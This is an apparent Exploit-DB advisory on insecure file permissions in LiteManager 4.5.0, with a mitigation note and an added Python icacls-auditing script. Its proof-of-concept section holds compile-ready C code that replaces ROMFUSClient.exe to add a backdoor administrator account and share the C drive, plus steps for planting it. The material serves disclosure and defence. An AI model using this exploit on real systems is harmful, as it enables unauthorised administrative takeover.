Vendor: LiteManager
By: ZwX
CVSS: 7.5 (HIGH)
Type: Insecure File Permissions
CWE: 275
Product Name: LiteManager
Affected Version From: LiteManager 4.5.0
Affected Version To: LiteManager 4.5.0
Patch Exists: NO
CPE: LiteManager 4.5.0
Platforms Tested: Windows 7
Year: 2019

LiteManager 4.5.0 – Insecure File Permissions

The LiteManager 4.5.0 software has insecure file permissions that allow an attacker to escalate privileges on the system. By replacing the legitimate ROMFUSClient.exe file with a malicious one, an attacker can execute arbitrary code with elevated privileges. This exploit code adds a new user, adds the user to the Administrators group, and grants full access to the C drive. When a more privileged user connects and uses the ROMFUSClient IDE, the privilege escalation is successful.

Mitigation:

Apply the vendor-supplied patch or update to the latest version of the software. Ensure that file permissions are properly set to prevent unauthorized modification.
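
A defender-side check for the condition described here, as an added example (not part of the original advisory or the Exploit-DB entry): it parses `icacls` output and reports files on which a low-privilege group holds write-class rights. The group-name list and the column-alignment handling are assumptions; principal names are localized, as the French listing in the proof of concept shows.

```python
import re

# icacls right codes that allow changing a file's content or its ACL.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "GA", "GW", "WDAC", "WO"}
# Low-privilege groups (assumed list; names are localized, last one is from this page).
BROAD = {"everyone", "builtin\\users", "nt authority\\authenticated users",
         "builtin\\utilisateurs"}
ACE = re.compile(r"^(?P<who>.+?):(?P<flags>(?:\([A-Za-z,]+\))+)$")

# Constructed sample: the icacls listing from the advisory, rebuilt line by line.
SAMPLE = "\n".join([
    "ROMFUSClient.exe Everyone:(F)",
    " " * 17 + "AUTORITE NT\\Système:(I)(F)",
    " " * 17 + "BUILTIN\\Administrateurs:(I)(F)",
    " " * 17 + "BUILTIN\\Utilisateurs:(I)(RX)",
])

def parse_icacls(text):
    """Yield (file, principal, codes) for each ACE line of an icacls listing."""
    lines = text.expandtabs().splitlines()
    current = None
    for i, line in enumerate(lines):
        if not line.strip():
            continue
        if not line[0].isspace():  # head line: "<file> <principal>:(...)"
            nxt = lines[i + 1] if i + 1 < len(lines) else ""
            indent = len(nxt) - len(nxt.lstrip())
            # ACEs are column-aligned; with one ACE, split at the first space.
            col = indent if nxt.strip() and indent else line.find(" ") + 1
            current, line = line[:col].strip(), line[col:]
        m = ACE.match(line.strip())
        if m and current:
            yield current, m["who"], set(re.findall(r"[A-Za-z]+", m["flags"]))

def risky_aces(text, broad=BROAD):
    """Return (file, principal, rights) where a broad group holds write-class access."""
    hits = []
    for path, who, codes in parse_icacls(text):
        if "DENY" in codes or who.lower() not in broad:
            continue  # deny ACEs and principals outside the broad list are skipped
        rights = sorted(codes & WRITE_RIGHTS)
        if rights:
            hits.append((path, who, rights))
    return hits

if __name__ == "__main__":
    for path, who, rights in risky_aces(SAMPLE):
        print(f"{path}: {who} holds {','.join(rights)}")
```

The single-ACE fallback assumes file names without spaces; pass a `broad` set with the group names of the system's display language when auditing other locales.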

Exploit-DB raw data:

# Exploit Title: LiteManager 4.5.0 - Insecure File Permissions
# Exploit Author: ZwX
# Exploit Date: 2019-11-21
# Vendor Homepage : LiteManager Team
# Software Link: http://html.tucows.com/preview/1594042/LiteManager-Free?q=remote+support
# Tested on OS: Windows 7 


# Proof of Concept (PoC):
==========================


C:\Program Files\LiteManagerFree - Server>icacls *.exe
ROMFUSClient.exe Everyone:(F)
                 AUTORITE NT\Système:(I)(F)
                 BUILTIN\Administrateurs:(I)(F)
                 BUILTIN\Utilisateurs:(I)(RX)
				 
				 
#Exploit code(s): 
=================

1) Compile below 'C' code name it as "ROMFUSClient.exe"

#include<windows.h>

int main(void){
 system("net user hacker abc123 /add");
 system("net localgroup Administrators hacker  /add");
 system("net share SHARE_NAME=c:\ /grant:hacker,full");
 WinExec("C:\\Program Files\\LiteManagerFree\\~ROMFUSClient.exe",0);
return 0;
} 

2) Rename original "ROMFUSClient.exe" to "~ROMFUSClient.exe"
3) Place our malicious "ROMFUSClient.exe" in the LiteManagerFree directory
4) Disconnect and wait for a more privileged user to connect and use ROMFUSClient IDE. 
Successful privilege escalation